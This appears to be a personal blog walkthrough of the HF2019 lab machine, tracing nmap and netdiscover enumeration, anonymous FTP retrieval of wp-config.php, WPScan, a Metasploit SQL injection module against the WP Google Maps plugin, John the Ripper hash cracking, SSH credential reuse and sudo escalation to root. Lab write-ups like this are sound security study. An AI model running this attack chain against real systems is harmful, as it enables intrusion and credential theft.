Post cover image

June 6, 2026

HF2019 Walkthrough | From Enumeration to Root (WordPress SQLi + Credential Reuse)

Introduction

Ajaydevsv

3 min read

Introduction

In this walkthrough, I performed a full penetration test against the HF2019 vulnerable machine. The attack chain involved service enumeration, anonymous FTP access, WordPress information disclosure, SQL Injection in the WP Google Maps plugin, password hash cracking, credential reuse, and privilege escalation to root.

This machine was solved in a controlled lab environment for educational purposes.

Phase 1: Host Discovery

First, I identified my attacker's IP address:

ip a
None

After confirming my network, I discovered active hosts:

sudo netdiscover
None

Target identified:

192.168.0.10

Phase 2: Port Enumeration

I started with a basic scan:

sudo nmap -Pn 192.168.0.10

Then performed a more detailed scan:

sudo nmap -sC -sV -O -Pn 192.168.0.10
None

Open ports discovered:

  • 21/tcp → FTP
  • 22/tcp → SSH
  • 80/tcp → HTTP
  • 10000/tcp → Webmin

Phase 3: Anonymous FTP Access

Testing FTP revealed anonymous login was enabled:

ftp 192.168.0.10

Username:

anonymous
None

Browsing the FTP share revealed the WordPress installation files.

Phase 4: Information Disclosure via wp-config.php

Since FTP allowed file downloads, I retrieved:

get wp-config.php
None

Inspecting the file:

cat wp-config.php

revealed:

  • Database name
  • Database username
  • Database password
  • Table prefix (wp_)

Phase 5: WordPress Enumeration

Using WPScan:

wpscan --url http://192.168.0.10 --enumerate u,p,t
None

Results:

User Found

webmaster

Plugin Found

wp-google-maps

WordPress Version

5.2.3

Phase 6: Vulnerability Research

Researching the plugin revealed a known SQL Injection vulnerability affecting:

WP Google Maps 7.11.00 - 7.11.17

Rapid7 already provided a Metasploit module for exploitation.

Phase 7: SQL Injection via Metasploit

Started Metasploit:

msfconsole

Search:

search wp_google_maps

Selected module:

use auxiliary/admin/http/wp_google_maps_sqli

Configured:

set RHOSTS 192.168.0.10

Executed:

run

Screenshot:

None

The module extracted credentials from the wp_users table:

webmaster
$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1

Phase 8: Password Hash Cracking

Saved the hash:

nano hash.txt

Cracked the hash:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Confirmed the password:

john --show hash.txt

Recovered credentials:

Username: webmaster
Password: kittykat1
None

Phase 9: Credential Reuse

The recovered credentials worked for:

WordPress Admin Panel

webmaster : kittykat1
None

SSH Access

ssh webmaster@192.168.0.10
None

Phase 10: Privilege Escalation

After gaining shell access, I gathered system information:

id
whoami
hostname
uname -a
sudo -l
None

Output:

(ALL) ALL

This indicated that the user webmaster could execute any command as root.

Escalation:

sudo su

Verification:

whoami

Output:

root
None

Attack Chain Summary

Enumeration

Anonymous FTP

wp-config.php Disclosure

WPScan

Plugin Enumeration

SQL Injection

Hash Extraction

John the Ripper

Credential Reuse

SSH Access

sudo -l

Root

Tools Used

  • Netdiscover
  • Nmap
  • FTP
  • WPScan
  • Metasploit Framework
  • John the Ripper

Conclusion

HF2019 demonstrated how multiple small weaknesses can combine into a complete system compromise:

  • Anonymous FTP access
  • Sensitive file exposure
  • Vulnerable WordPress plugin
  • Weak password
  • Credential reuse
  • Misconfigured sudo permissions

This machine reinforced the importance of proper enumeration and understanding the attack chain instead of blindly running tools.

Connect With Me

LinkedIn

www.linkedin.com/in/ajaydev-s

GitHub

https://github.com/Ajaydevs007/vapt-journey